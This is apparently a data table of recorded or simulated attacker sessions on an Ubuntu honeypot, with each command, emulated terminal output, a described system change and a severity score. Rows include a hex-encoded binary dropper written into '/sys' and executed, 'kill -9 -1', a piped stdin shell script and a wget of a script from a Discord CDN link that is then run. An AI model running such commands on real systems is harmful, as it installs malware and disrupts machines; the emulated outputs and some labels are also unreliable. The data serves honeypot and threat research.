8174d7ecb2bf | 2021_2022 | 31 | echo -ne '\x24\x08\x59\x24\x09\xf8\x20\x03\x00\x00\x00\x00\x10\x00\xbc\x8f\x28\x00\x42\x24\x18\x00\xbf\x8f\x20\x00\xbd\x27\x08\x00\xe0\x03\x00\x00\x00\x00\x3b\xe8\x03\x7c\x08\x00\xe0\x03\x24\x8f\x62\x24\x6d\x69\x70\x73\x65\x6c\x00\x00\x6e\x74\x70\x63\x6c\x69\x65\x6e\x74\x00\x00\x00\x47\x45\x54\x20\x2f\x73\x73\x68\x2f\x... | root@ubuntu:/sys# echo -ne '\x24\x08\x59\x24\x09\xf8\x20\x03\x00\x00\x00\x00\x10\x00\xbc\x8f\x28\x00\x42\x24\x18\x00\xbf\x8f\x20\x00\xbd\x27\x08\x00\xe0\x03\x00\x00\x00\x00\x3b\xe8\x03\x7c\x08\x00\xe0\x03\x24\x8f\x62\x24\x6d\x69\x70\x73\x65\x6c\x00\x00\x6e\x74\x70\x63\x6c\x69\x65\x6e\x74\x00\x00\x00\x47\x45\x54\x20\x2f... |
- The 'ddnsclient' file in the '/sys' directory was appended with new binary content.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 32 | echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x07\x40\x00\xbc\x01\x40\x00\x30\x02\x40\x00\x48\x01\x40\x00\x94\x01\x40\x00\xa0\x00\x40\x00\xe4\x01\x40\x00\xe8\x00\x40\x00\x04\x01\x40\x00\xe0\x04\x40\x00\x50\x07\x40\x00\x20\x01\x40\x00\x00\x07\x40\x00\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x... | root@ubuntu:/sys# echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x07\x40\x00\xbc\x01\x40\x00\x30\x02\x40\x00\x48\x01\x40\x00\x94\x01\x40\x00\xa0\x00\x40\x00\xe4\x01\x40\x00\xe8\x00\x40\x00\x04\x01\x40\x00\xe0\x04\x40\x00\x50\x07\x40\x00\x20\x01\x40\x00\x00\x07\x40\x00\x00\x2e\x73\x68\x73... |
- The 'ddnsclient' file in the '/sys' directory was appended with new binary content.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 33 | echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\xa0\x00\x40\x00\xa0\x00\x00\x00\x90\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x32\x00\x00\x00\x30\x... | root@ubuntu:/sys# echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\xa0\x00\x40\x00\xa0\x00\x00\x00\x90\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x32... |
- The 'ddnsclient' file in the '/sys' directory was appended with new binary content.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 34 | echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x1e\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x48\x00\x00\x00\xc4\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc4\x08\x00\x00\x2c\x... | root@ubuntu:/sys# echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x1e\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x48\x00\x00\x00\xc4\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc4... |
- The 'ddnsclient' file in the '/sys' directory was appended with new binary content.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 35 | ./ddnsclient; chmod 777 ntpclient; ./ntpclient | root@ubuntu:/sys# ./ddnsclient
root@ubuntu:/sys# chmod 777 ntpclient
root@ubuntu:/sys# ./ntpclient
root@ubuntu:/sys# |
- The 'ddnsclient' executable was run.
- The 'ntpclient' file permissions were changed to 777 (full permissions for all users).
- The 'ntpclient' executable was run. | 3 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 36 | kill %%1 | root@ubuntu:/sys# kill %%1
root@ubuntu:/sys# |
- The job with job ID 1 was terminated. | 3 | curated_ubuntu |
8174d7ecb2bf | 2021_2022 | 37 | echo A | root@ubuntu:/sys# echo A
A
root@ubuntu:/sys# |
- The string 'A' was printed to the terminal. | 0 | curated_ubuntu |
79a0ec5c3fcc | 2021_2022 | 0 | ls | root@ubuntu:~# ls
Desktop Documents Downloads Music Pictures Public Templates Videos
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
79a0ec5c3fcc | 2021_2022 | 1 | pwd | root@ubuntu:~# pwd
/root
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
79a0ec5c3fcc | 2021_2022 | 2 | cd /home | root@ubuntu:~# cd /home
root@ubuntu:/home# | The working directory was changed to '/home'. | 2 | curated_ubuntu |
79a0ec5c3fcc | 2021_2022 | 3 | ls | root@ubuntu:/home# ls
user1 user2 user3
root@ubuntu:/home# | No changes to the system were made. | 0 | curated_ubuntu |
79a0ec5c3fcc | 2021_2022 | 4 | cd phil | root@ubuntu:/home# cd phil
root@ubuntu:/home/phil# | The working directory was changed to '/home/phil'. | 2 | curated_ubuntu |
79a0ec5c3fcc | 2021_2022 | 5 | ls | root@ubuntu:/home/phil# ls
Desktop Documents Downloads Music Pictures Public Templates Videos
root@ubuntu:/home/phil# | No changes to the system were made. | 0 | curated_ubuntu |
79a0ec5c3fcc | 2021_2022 | 6 | cd /etc | root@ubuntu:/home/phil# cd /etc
root@ubuntu:/etc# | The working directory was changed to '/etc'. | 2 | curated_ubuntu |
79a0ec5c3fcc | 2021_2022 | 7 | ls | root@ubuntu:/etc# ls
acpi inputrc rc6.d
adduser.conf iproute2 rc.local
alternatives issue rcS.d
apache2 issue.net resolv.conf
apg.conf java-11-openjdk rmt
apparmor ... | No changes to the system were made. | 0 | curated_ubuntu |
79a0ec5c3fcc | 2021_2022 | 8 | cd /proc | root@ubuntu:/etc# cd /proc
root@ubuntu:/proc# | The working directory was changed to '/proc'. | 2 | curated_ubuntu |
79a0ec5c3fcc | 2021_2022 | 9 | ls | root@ubuntu:/proc# ls
1 15 20 26 31 36 4 45 50 56 acpi diskstats kpageflags
10 16 21 27 32 37 40 46 51 57 asound dma loadavg
11 17 22 28 33 38 41 47 52 58 buddyinfo driver locks
12 18 2... | No changes to the system were made. | 0 | curated_ubuntu |
79a0ec5c3fcc | 2021_2022 | 10 | cd | root@ubuntu:/proc# cd
root@ubuntu:~# | The working directory was changed to the home directory of the current user, which is '/root' for the root user. | 2 | curated_ubuntu |
79a0ec5c3fcc | 2021_2022 | 11 | pwd | root@ubuntu:~# pwd
/root
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
79a0ec5c3fcc | 2021_2022 | 12 | cd /dev | root@ubuntu:~# cd /dev
root@ubuntu:/dev# | The working directory was changed to '/dev'. | 2 | curated_ubuntu |
79a0ec5c3fcc | 2021_2022 | 13 | ls | root@ubuntu:/dev# ls
autofs loop2 ram13 tty0 tty15 tty20 tty26 tty31 tty37 tty42 tty48 tty53 tty59 ttyS0 ttyS6 vcs6
block loop3 ram14 tty1 tty16 tty21 tty27 tty32 tty38 tty43 tty49 tty54 tty6 ttyS1 ttyS7 vcs7
bsg loop4 ... | No changes to the system were made. | 0 | curated_ubuntu |
79a0ec5c3fcc | 2021_2022 | 14 | cd .. | root@ubuntu:/dev# cd ..
root@ubuntu:/# | The working directory was changed to '/'. | 2 | curated_ubuntu |
79a0ec5c3fcc | 2021_2022 | 15 | pwd | root@ubuntu:/# pwd
/
root@ubuntu:/# | No changes to the system were made. | 0 | curated_ubuntu |
79a0ec5c3fcc | 2021_2022 | 16 | ls | root@ubuntu:/# ls
bin dev home lib32 lost+found mnt proc run srv tmp var
boot etc lib lib64 media opt root sbin sys usr
root@ubuntu:/# | No changes to the system were made. | 0 | curated_ubuntu |
79a0ec5c3fcc | 2021_2022 | 17 | cd bin | root@ubuntu:/# cd bin
root@ubuntu:/bin# | The working directory was changed to '/bin'. | 2 | curated_ubuntu |
79a0ec5c3fcc | 2021_2022 | 18 | ls | root@ubuntu:/bin# ls
bash cat chmod cp dash date dd df dir echo false ln ls mkdir mknod more mount mv ps pwd rm rmdir sh stty su sync true umount uname
root@ubuntu:/bin# | No changes to the system were made. | 0 | curated_ubuntu |
79a0ec5c3fcc | 2021_2022 | 19 | cd boot | root@ubuntu:/bin# cd boot
bash: cd: boot: No such file or directory
root@ubuntu:/bin# | No changes to the system were made. | 0 | curated_ubuntu |
79a0ec5c3fcc | 2021_2022 | 20 | cd .. | root@ubuntu:/bin# cd ..
root@ubuntu:/# | The working directory was changed to '/'. | 2 | curated_ubuntu |
79a0ec5c3fcc | 2021_2022 | 21 | cd boot | root@ubuntu:/# cd boot
root@ubuntu:/boot# | The working directory was changed to '/boot'. | 2 | curated_ubuntu |
79a0ec5c3fcc | 2021_2022 | 22 | ls | root@ubuntu:/boot# ls
config-5.4.0-159-generic initrd.img-5.4.0-159-generic System.map-5.4.0-159-generic vmlinuz-5.4.0-159-generic
grub lost+found vmlinuz vmlinuz.old
root@ubuntu:/boot# | No changes to the system were made. | 0 | curated_ubuntu |
79a0ec5c3fcc | 2021_2022 | 23 | cd .. | root@ubuntu:/boot# cd ..
root@ubuntu:/# | The working directory was changed to '/'. | 2 | curated_ubuntu |
79a0ec5c3fcc | 2021_2022 | 24 | cd mnt | root@ubuntu:/# cd mnt
root@ubuntu:/mnt# | The working directory was changed to '/mnt'. | 2 | curated_ubuntu |
79a0ec5c3fcc | 2021_2022 | 25 | ls | root@ubuntu:/mnt# ls
root@ubuntu:/mnt# | No changes to the system were made. | 0 | curated_ubuntu |
79a0ec5c3fcc | 2021_2022 | 26 | cd opt | root@ubuntu:/mnt# cd opt
bash: cd: opt: No such file or directory
root@ubuntu:/mnt# | No changes to the system were made. | 0 | curated_ubuntu |
79a0ec5c3fcc | 2021_2022 | 27 | cd .. | root@ubuntu:/mnt# cd ..
root@ubuntu:/# | The working directory was changed to '/'. | 2 | curated_ubuntu |
79a0ec5c3fcc | 2021_2022 | 28 | cd opt | root@ubuntu:/# cd opt
root@ubuntu:/opt# | The working directory was changed to '/opt'. | 2 | curated_ubuntu |
79a0ec5c3fcc | 2021_2022 | 29 | ls | root@ubuntu:/opt# ls
root@ubuntu:/opt# | No changes to the system were made. | 0 | curated_ubuntu |
1c5878c7a3d2 | 2021_2022 | 0 | ls | root@ubuntu:~# ls
Desktop Documents Downloads Music Pictures Public Templates Videos
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
1c5878c7a3d2 | 2021_2022 | 1 | ls | root@ubuntu:~# ls
Desktop Documents Downloads Music Pictures Public Templates Videos
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
1c5878c7a3d2 | 2021_2022 | 2 | pwd | root@ubuntu:~# pwd
/root
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
1c5878c7a3d2 | 2021_2022 | 3 | ls | root@ubuntu:~# ls
Desktop Documents Downloads Music Pictures Public Templates Videos
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
1c5878c7a3d2 | 2021_2022 | 4 | cd .. | root@ubuntu:~# cd ..
root@ubuntu:/# | The working directory was changed to '/'. | 2 | curated_ubuntu |
1c5878c7a3d2 | 2021_2022 | 5 | ls | root@ubuntu:/# ls
bin dev home lib32 lost+found mnt proc run srv tmp var
boot etc lib lib64 media opt root sbin sys usr
root@ubuntu:/# | No changes to the system were made. | 0 | curated_ubuntu |
1c5878c7a3d2 | 2021_2022 | 6 | cd home | root@ubuntu:/# cd home
root@ubuntu:/home# | The working directory was changed to '/home'. | 2 | curated_ubuntu |
1c5878c7a3d2 | 2021_2022 | 7 | ls | root@ubuntu:/home# ls
user1 user2 user3
root@ubuntu:/home# | No changes to the system were made. | 0 | curated_ubuntu |
1c5878c7a3d2 | 2021_2022 | 8 | cd phil | root@ubuntu:/home# cd phil
root@ubuntu:/home/phil# | The working directory was changed to '/home/phil'. | 2 | curated_ubuntu |
498c2bd73ffe | 2021_2022 | 0 | w | root@ubuntu:~# w
01:56:47 up 2:00, 1 user, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 192.168.1.100 01:56 0.00s 0.04s 0.00s w
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
498c2bd73ffe | 2021_2022 | 1 | uname -a | root@ubuntu:~# uname -a
Linux user 5.4.0-159-generic #176-Ubuntu SMP Wed Oct 13 16:45:01 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
498c2bd73ffe | 2021_2022 | 2 | cd /tmp | root@ubuntu:~# cd /tmp
root@ubuntu:/tmp# | The working directory was changed to '/tmp'. | 2 | curated_ubuntu |
498c2bd73ffe | 2021_2022 | 3 | ps -a | root@ubuntu:/tmp# ps -a
PID TTY TIME CMD
123 pts/0 00:00:00 bash
456 pts/0 00:00:00 ps
root@ubuntu:/tmp# | No changes to the system. | 0 | curated_ubuntu |
498c2bd73ffe | 2021_2022 | 4 | python | root@ubuntu:/tmp# python
Python 3.6.9 (default, Jan 26 2021, 15:33:00)
[GCC 8.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> | No changes to the system. | 0 | curated_ubuntu |
498c2bd73ffe | 2021_2022 | 5 | cat /etc/issue | root@ubuntu:/tmp# cat /etc/issue
Ubuntu 18.04.5 LTS \n \l
root@ubuntu:/tmp# | No changes to the system. | 0 | curated_ubuntu |
498c2bd73ffe | 2021_2022 | 6 | apt-get install screenfetch | root@ubuntu:/tmp# apt-get install screenfetch
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
screenfetch
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 0 B/52.6 kB of archives.
After this operati... | The 'screenfetch' utility was installed. | 1 | curated_ubuntu |
498c2bd73ffe | 2021_2022 | 7 | screenfetch | root@ubuntu:/tmp# screenfetch
./+o+- root@ubuntu
yyyyy- -yyyyyy+ OS: Ubuntu 18.04 bionic
://+//////-yyyyyyo Kernel: x86_64 Linux 5.4.0-159-generic
.++ .:/++++++/-.+sss/` Uptime: 2h 5m
.:++o: /++++++++/:--:/- Packag... | No changes to the system. | 0 | curated_ubuntu |
498c2bd73ffe | 2021_2022 | 8 | kill -9 -1` | root@ubuntu:/tmp# kill -9 -1
root@ubuntu:/tmp# | All processes except the kill process itself were terminated. | 3 | curated_ubuntu |
498c2bd73ffe | 2021_2022 | 9 | kill -9 -1 | root@ubuntu:/tmp# kill -9 -1
root@ubuntu:/tmp# | All processes except the kill process itself were terminated again. | 3 | curated_ubuntu |
485ffa2300c8 | 2021_2022 | 0 | echo "Z""IGAZAGA148""8"
cat /dev/stdin | sh
#!/usr/bin/sh
#timeout=30
killSTDIN() {
processID=$(ps -u | grep -v 'grep' | grep cat | grep '/dev/stdin' | head -n 1 | awk -F ' ' '{ print $2 }');
ps -u | grep -v grep | grep cat | grep /dev/stdin | head -n 1 | awk -F { print $2 }
$(kill -9 $processID);
kill -9 $pr... | root@ubuntu:~# echo "Z""IGAZAGA148""8"
ZIGAZAGA1488
root@ubuntu:~# cat /dev/stdin | sh
root@ubuntu:~# #!/usr/bin/sh
root@ubuntu:~# #timeout=30
root@ubuntu:~# killSTDIN() {
> processID=$(ps -u | grep -v 'grep' | grep cat | grep '/dev/stdin' | head -n 1 | awk -F ' ' '{ print $2 }');
> ps -u | grep -v grep | grep cat | gr... | The command executed a series of shell scripts that displayed system information such as the system's kernel version, the user's ID, and the system's uptime. The scripts also attempted to kill any processes reading from stdin. | 0 | curated_ubuntu |
c0ae929d38c0 | 2021_2022 | 0 | while [ -d /proc/$PPID ]; do sleep 1;head -v -n 8 /proc/meminfo; head -v -n 2 /proc/stat /proc/version /proc/uptime /proc/loadavg /proc/sys/fs/file-nr /proc/sys/kernel/hostname; tail -v -n 16 /proc/net/dev;echo '==> /proc/df <==';df;echo '==> /proc/who <==';who;echo '==> /proc/end <==';echo '##Moba##'; done | root@ubuntu:~# while [ -d /proc/$PPID ]; do sleep 1;head -v -n 8 /proc/meminfo; head -v -n 2 /proc/stat /proc/version /proc/uptime /proc/loadavg /proc/sys/fs/file-nr /proc/sys/kernel/hostname; tail -v -n 16 /proc/net/dev;echo '==> /proc/df <==';df;echo '==> /proc/who <==';who;echo '==> /proc/end <==';echo '##Moba##'; d... | No changes to the system were made. | 0 | curated_ubuntu |
c0ae929d38c0 | 2021_2022 | 1 | lscpu | root@ubuntu:~# lscpu
Architecture: x86_64
CPU op-mode(s): 32-bit, 64-bit
Byte Order: Little Endian
CPU(s): 24
On-line CPU(s) list: 0-23
Thread(s) per core: 2
Core(s) per socket: 12
Socket(s): 1
NUMA node(s): 1
Vendor ID: GenuineIntel
CPU family: 6
... | No changes to the system were made. | 0 | curated_ubuntu |
c0ae929d38c0 | 2021_2022 | 2 | sudo su | root@ubuntu:~# sudo su
root@ubuntu:~# | The user has switched to the root user. | 3 | curated_ubuntu |
aa666a52ef39 | 2021_2022 | 0 | wget https://cdn.discordapp.com/attachments/834709504049414155/836574658668265522/New_Text_Document.sh | root@ubuntu:~# wget https://cdn.discordapp.com/attachments/834709504049414155/836574658668265522/New_Text_Document.sh
--2023-10-31 19:12:44-- https://cdn.discordapp.com/attachments/834709504049414155/836574658668265522/New_Text_Document.sh
Resolving cdn.discordapp.com (cdn.discordapp.com)... 162.159.134.233, 162.159.1... | root@ubuntu:~#
```
A new file named 'New_Text_Document.sh' has been downloaded from the URL 'https://cdn.discordapp.com/attachments/834709504049414155/836574658668265522/New_Text_Document.sh' and saved in the current directory. | 3 | curated_ubuntu |
aa666a52ef39 | 2021_2022 | 1 | top | root@ubuntu:~# top
top - 19:13:05 up 2:00, 1 user, load average: 0.00, 0.01, 0.05
Tasks: 133 total, 1 running, 132 sleeping, 0 stopped, 0 zombie
%Cpu(s): 0.7 us, 0.3 sy, 0.0 ni, 98.9 id, 0.1 wa, 0.0 hi, 0.0 si, 0.0 st
MiB Mem : 708590.8 total, 698362.3 free, 7228.5 used, 3000.0 buff/cache
MiB Swap: ... | None | 0 | curated_ubuntu |
aa666a52ef39 | 2021_2022 | 2 | ps x | root@ubuntu:~# ps x
PID TTY STAT TIME COMMAND
1 ? Ss 0:05 /sbin/init splash
2 ? S 0:00 [kthreadd]
3 ? I< 0:00 [rcu_gp]
4 ? I< 0:00 [rcu_par_gp]
6 ? I< 0:00 [kworker/0:0H-kb]
8 ? I< 0:00 [mm_percpu_wq]
9 ? S ... | None | 0 | curated_ubuntu |
aa666a52ef39 | 2021_2022 | 3 | lscpu | root@ubuntu:~# lscpu
Architecture: x86_64
CPU op-mode(s): 32-bit, 64-bit
Byte Order: Little Endian
CPU(s): 16
On-line CPU(s) list: 0-15
Thread(s) per core: 2
Core(s) per socket: 8
Socket(s): 1
NUMA node(s): 1
Vendor ID: GenuineIntel
CPU family: 6
M... | None | 0 | curated_ubuntu |
aa666a52ef39 | 2021_2022 | 4 | bash New_Text_Document.sh | root@ubuntu:~# bash New_Text_Document.sh
date
root@ubuntu:~# | The 'New_Text_Document.sh' script was executed, which printed the string "date". | 1 | curated_ubuntu |
aa666a52ef39 | 2021_2022 | 5 | bash New_Text_Document.sh | root@ubuntu:~# bash New_Text_Document.sh
date
root@ubuntu:~# | The 'New_Text_Document.sh' script was executed again, which printed the string "date". | 1 | curated_ubuntu |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.